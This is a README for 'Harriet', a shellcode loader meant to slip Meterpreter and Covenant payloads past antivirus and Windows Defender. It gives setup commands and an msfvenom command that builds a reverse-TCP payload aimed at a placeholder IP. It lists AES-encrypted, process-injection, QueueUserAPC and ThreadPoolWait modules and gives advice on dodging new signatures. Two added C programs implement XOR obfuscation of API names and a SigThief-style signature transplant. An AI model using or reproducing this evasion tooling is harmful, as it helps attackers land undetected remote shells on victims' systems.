Meet Harriet!

Harriet was inspired by the Charlotte C++ shellcode loader. The tool AES-encrypts the payload and obfuscates function and variable names to get past AV and Windows Defender. Most of the code comes from the Sektor 7 Malware Development Essentials course; all credit goes to reenz0h and @Sektor7net. I wrote this mainly as a way to get a quick undetected executable for testing, and to avoid switching over to a Windows VM every five seconds just to compile.

The payload framework is very effective when paired with my Covenant Randomizer script.

I was able to bypass Defender with Covenant with no problems.

I was also able to bypass Defender with a Meterpreter payload. This may be less reliable, since Meterpreter is so heavily signatured: your results will vary unless you modify the Meterpreter payload template inside Metasploit. Less commonly used payloads will probably yield better results.

Modules

There are currently four modules. As of this writing, all four bypass AV/Defender:

- AES-encrypted payload
- AES-encrypted payload with process injection
- QueueUserAPC shellcode execution
- ThreadPoolWait shellcode execution

All of the modules XOR-encrypt their strings and obfuscate function names, and the payload itself is AES-encrypted and only decrypted at runtime for execution. Once the payload is compiled, the script uses SigThief to copy the Authenticode signature of a Microsoft-signed binary onto the output. Note that a copied signature does not validate (its hash covers the donor binary, not yours), so it only helps against checks that look for the mere presence of a signature.
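The string-obfuscation half of that, as an added example in C that is not Harriet's or Sektor 7's own code: the same XOR routine encodes an API name at build time (emitting the byte array a generator script would paste into the loader source) and decodes it into a stack buffer at run time, so the plaintext never sits in the binary's string table. The key bytes, the function names and the sample API names are all my own choices for the demo, not values from the project.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed demo key (all bytes non-zero, so no plaintext byte survives unchanged).
 * Harriet's own key material and generator script are not shown here. */
static const uint8_t XOR_KEY[] = { 0x5a, 0x3c, 0x91, 0xe7, 0x0d };
#define XOR_KEY_LEN (sizeof XOR_KEY)

/* Symmetric rolling XOR: the same routine encodes at build time and decodes at run time. */
static void xor_crypt(uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= XOR_KEY[i % XOR_KEY_LEN];
}

/* Build-time step: encode a plaintext API name into the bytes that go into the source.
 * Returns the encoded length, or 0 if the input is empty or does not fit. */
size_t xor_encode(const char *plain, uint8_t *out, size_t outcap)
{
    size_t n = strlen(plain);
    if (n == 0 || n > outcap) return 0;
    memcpy(out, plain, n);
    xor_crypt(out, n);
    return n;
}

/* Run-time step: decode into a caller-supplied buffer of at least len + 1 bytes. */
void xor_decode(const uint8_t *enc, size_t len, char *out)
{
    memcpy(out, enc, len);
    xor_crypt((uint8_t *)out, len);
    out[len] = '\0';
}

/* What a naive strings-style scan does: look for the plaintext anywhere in a byte blob. */
int blob_has_plaintext(const uint8_t *blob, size_t bloblen, const char *needle)
{
    size_t n = strlen(needle);
    if (n == 0 || n > bloblen) return 0;
    for (size_t i = 0; i + n <= bloblen; i++)
        if (memcmp(blob + i, needle, n) == 0) return 1;
    return 0;
}

/* Print the encoded bytes as a C initializer, the way a generator script would. */
void emit_c_array(const char *name, const uint8_t *enc, size_t len)
{
    printf("unsigned char s%s[%zu] = {", name, len);
    for (size_t i = 0; i < len; i++)
        printf("%s0x%02x", i ? ", " : " ", enc[i]);
    printf(" };\n");
}

/* Full round trip for one string: 1 when the encoded form hides the plaintext and
 * decoding restores it exactly, 0 otherwise. */
int roundtrip_ok(const char *s)
{
    uint8_t enc[256];
    char dec[257];
    size_t n = xor_encode(s, enc, sizeof enc);
    if (n == 0) return 0;
    if (blob_has_plaintext(enc, n, s)) return 0;   /* plaintext leaked into the blob */
    xor_decode(enc, n, dec);
    int ok = strcmp(dec, s) == 0;
    /* Wipe the cleartext copy once it has been used (in real code use
     * SecureZeroMemory/explicit_bzero so the compiler cannot drop the wipe). */
    memset(dec, 0, sizeof dec);
    return ok;
}

int main(void)
{
    const char *apis[] = { "VirtualAlloc", "CreateRemoteThread", "QueueUserAPC" };
    for (size_t i = 0; i < 3; i++) {
        uint8_t enc[64];
        size_t n = xor_encode(apis[i], enc, sizeof enc);
        emit_c_array(apis[i], enc, n);
        printf("  plaintext visible: %d, roundtrip ok: %d\n",
               blob_has_plaintext(enc, n, apis[i]), roundtrip_ok(apis[i]));
    }
    return 0;
}
```

This only defeats static string matching: the decoded name is visible to a memory scan or an emulator once the loader runs, and the decode loop itself becomes a signature if it is reused unchanged across samples, which is why the randomization discussed below matters.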

Usage:

Clone The Repo

git clone https://github.com/assume-breach/Home-Grown-Red-Team.git

Run The Setup Script

cd Home-Grown-Red-Team/Harriet/

bash setup.sh

The setup script will give you the self-signed cert you need for executable signing.

Create Your Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=IP lport=PORT -f raw > msfr.bin

Run the Script

bash Harriet.sh

Fill In The Values As Prompted

Mitigations

There are a few issues to be aware of. The first is that this loader will be detected at some point: eventually a sample will land on VirusTotal or the AV engines will write a signature for it. You can customize it to stay ahead of that. First, change the Virt_Alloc variable in all of the scripts. Second, change all of the values in the randomization scripts. Adding various sleep functions within the scripts also changes the compiled code enough to break an existing signature. The binary Harriet uses as the signature donor is a Microsoft Office 365 updater; you can swap in a different signed binary and update the path to it in the scripts. This helps keep your loader undetected, since a widely reused donor signature is itself an easy static indicator.
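What the SigThief signing step in the modules section and the donor swap described above actually do, as an added illustration in C that is not Harriet's or SigThief's own code: the donor's certificate table (the bytes its security data directory points at) is appended to the end of the target and the target's directory entry is rewritten to point there. The PE32+ stub and the WIN_CERTIFICATE blob are constructed in memory so the demo runs anywhere; the 16 bytes of 0xAB stand in for a real PKCS#7 SignedData blob, and all function names are mine. Because the Authenticode hash inside that blob covers the donor and not your loader, signtool verify or Get-AuthenticodeSignature reports the signature as invalid; changing the donor only changes which stale signature a scanner sees.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* In-memory PE image for the demo. Offsets follow the PE/COFF spec: e_lfanew at 0x3c,
 * a 20-byte COFF header after "PE\0\0", the data directory 96 (PE32) or 112 (PE32+)
 * bytes into the optional header, and IMAGE_DIRECTORY_ENTRY_SECURITY as entry 4. */
#define MAX_PE 4096
typedef struct { uint8_t data[MAX_PE]; size_t len; } pe_image;

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* File offset of the 8-byte security directory entry, or 0 if this is not a PE. */
static size_t security_dir_entry(const pe_image *pe)
{
    if (pe->len < 0x40 || rd16(pe->data) != 0x5a4d) return 0;             /* "MZ" */
    uint32_t e_lfanew = rd32(pe->data + 0x3c);
    if ((size_t)e_lfanew + 24 + 2 > pe->len) return 0;
    if (rd32(pe->data + e_lfanew) != 0x00004550) return 0;                 /* "PE\0\0" */
    size_t opt = e_lfanew + 24;
    uint16_t magic = rd16(pe->data + opt);
    size_t dd = magic == 0x20b ? opt + 112 : magic == 0x10b ? opt + 96 : 0;
    if (dd == 0) return 0;
    size_t entry = dd + 4 * 8;
    return entry + 8 <= pe->len ? entry : 0;
}

/* Locate the certificate table. Its "VirtualAddress" is a raw file offset, not an RVA. */
int pe_cert_table(const pe_image *pe, uint32_t *off, uint32_t *size)
{
    size_t entry = security_dir_entry(pe);
    if (entry == 0) return 0;
    *off = rd32(pe->data + entry);
    *size = rd32(pe->data + entry + 4);
    return *size != 0 && (size_t)*off + *size <= pe->len;
}

/* Append a certificate table (8-byte aligned, as the spec requires) and point the
 * security directory at it. The Authenticode hash is NOT recomputed: that is the point. */
static int attach_cert_table(pe_image *pe, const uint8_t *tbl, size_t n)
{
    size_t entry = security_dir_entry(pe);
    if (entry == 0 || n == 0) return 0;
    size_t at = (pe->len + 7) & ~(size_t)7;
    if (at + n > MAX_PE) return 0;
    memset(pe->data + pe->len, 0, at - pe->len);
    memcpy(pe->data + at, tbl, n);
    pe->len = at + n;
    wr32(pe->data + entry, (uint32_t)at);
    wr32(pe->data + entry + 4, (uint32_t)n);
    return 1;
}

/* SigThief-style transplant: copy the donor's whole certificate table onto the target. */
int transplant_signature(pe_image *target, const pe_image *donor)
{
    uint32_t off, size;
    if (!pe_cert_table(donor, &off, &size)) return 0;
    return attach_cert_table(target, donor->data + off, size);
}

/* Constructed PE32+ header plus `body` bytes of padding: enough for the directory
 * parsing above, not a loadable executable. */
void build_stub(pe_image *pe, size_t body)
{
    memset(pe, 0, sizeof *pe);
    wr16(pe->data, 0x5a4d);
    wr32(pe->data + 0x3c, 0x40);
    wr32(pe->data + 0x40, 0x00004550);
    wr16(pe->data + 0x44, 0x8664);          /* Machine: AMD64 */
    wr16(pe->data + 0x54, 240);             /* SizeOfOptionalHeader for PE32+ */
    wr16(pe->data + 0x58, 0x20b);           /* Magic: PE32+ */
    wr32(pe->data + 0x58 + 108, 16);        /* NumberOfRvaAndSizes */
    pe->len = 0x58 + 240 + body;
}

/* Demo: give a donor a constructed WIN_CERTIFICATE (dwLength, wRevision 0x0200,
 * wCertificateType 0x0002 = PKCS#7) wrapping 16 fake bytes, transplant it onto an
 * unsigned stub, and return the resulting table size (0 on any failure). */
uint32_t demo_transplant(void)
{
    pe_image donor, target;
    uint8_t cert[24];
    uint32_t off, size;
    build_stub(&donor, 512);
    build_stub(&target, 300);               /* 628 bytes: not 8-aligned, exercises padding */
    wr32(cert, 24); wr16(cert + 4, 0x0200); wr16(cert + 6, 0x0002);
    memset(cert + 8, 0xAB, 16);             /* stand-in for the PKCS#7 SignedData blob */
    if (!attach_cert_table(&donor, cert, sizeof cert)) return 0;
    if (pe_cert_table(&target, &off, &size)) return 0;      /* target must start unsigned */
    if (!transplant_signature(&target, &donor)) return 0;
    if (!pe_cert_table(&target, &off, &size)) return 0;
    if (off % 8 != 0 || memcmp(target.data + off, cert, sizeof cert) != 0) return 0;
    return size;
}

/* A non-PE buffer must be rejected rather than mis-parsed. */
int rejects_non_pe(void)
{
    pe_image junk; uint32_t off, size;
    memset(junk.data, 'A', sizeof junk.data); junk.len = 256;
    return pe_cert_table(&junk, &off, &size) == 0;
}

int main(void)
{
    printf("transplanted certificate table: %u bytes\n", demo_transplant());
    return 0;
}
```

Running pe_cert_table over your own output is a quick way to confirm the table was attached; running a real verifier over it is the way to confirm what a defender will see, namely a hash mismatch.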

Enjoy, and DON'T UPLOAD TO VirusTotal! Samples uploaded there are shared with AV vendors, which is exactly how loaders like this get signatured.